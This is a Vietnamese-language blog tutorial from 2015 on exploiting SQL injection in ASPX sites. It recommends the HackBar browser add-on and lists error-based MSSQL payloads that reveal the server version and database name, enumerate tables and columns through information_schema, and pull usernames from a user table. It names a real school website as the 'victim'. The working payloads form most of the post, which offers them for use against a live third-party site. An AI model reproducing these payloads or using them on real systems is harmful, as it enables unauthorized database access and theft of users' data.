NEWS

Ảnh bìa

Khai Thác Lổi SQL Dạng ASPX





 HÔM NAY TÔI SẺ HƯỚNG DẨN CÁC BẠN KHAI THÁC LỔI SQL DẠNG ASPX
- Phần mền bổ trợ : HACK BAR : ta vào Mozilla Firefox tải về nhá .. ▼
- Đây là những câu lệnh để các bạn tham khổ qua video .chúng ta có thể áp dụng nó để khai thác 1 cách dể dàng hơn :
  victim http://thptnguyenthaibinh.edu.vn

' and 1=convert(int,@@version))-- - (version)
'and 1=convert(int,db_name()))-- -  (database)
' and 1=convert(int,(select top 1 table_name from information_schema.tables)))-- -
ta thêm where table_name not in('table vừa tìm được') sau chử tables.. để tiềm thêm các table(table bên cạnh)
(lưu ý) nếu như chưa có table chúng ta cần thì tiếp tục theo vào và nhớ thêm dấu , khi khai thác các table tiếp theo
-- nhìn kỷ đoạn này nhá ..vì rất là dể quên à--
'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('table cần khai thác'))))-- -
vd như nảy ta ckeck dc tbuser thì thêm vào đó là ('tbuser')
nếu ta mún khai thác cloum cạnh bên thì thêm and column_name not in ('cái mới vừa được khai thác'))))-- - 
giờ tìm user nhá 'and 1=convert(int,(select top 1 ten from tbuser)))-- -
-- nhớ kỷ (ten) và (user) nha.. ghi theo cái mà ta khai thác được  
Khai Thác Lổi SQL Dạng ASPX Reviewed by Nam on Wednesday, December 09, 2015 Rating: 5

No comments:

Cảm ơn bạn đã đánh giá chúng tôi.Chúng tôi sẽ hoàn thiện và trả lời cho bạn trong thời gian sớm nhất

All Rights Reserved by ๖ۣۜVõ ๖ۣۜHoài ๖ۣۜNam © 2015 - 2016
Designed by Võ Hoài Nam

Contact Form

Name

Email *

Message *

Powered by Blogger.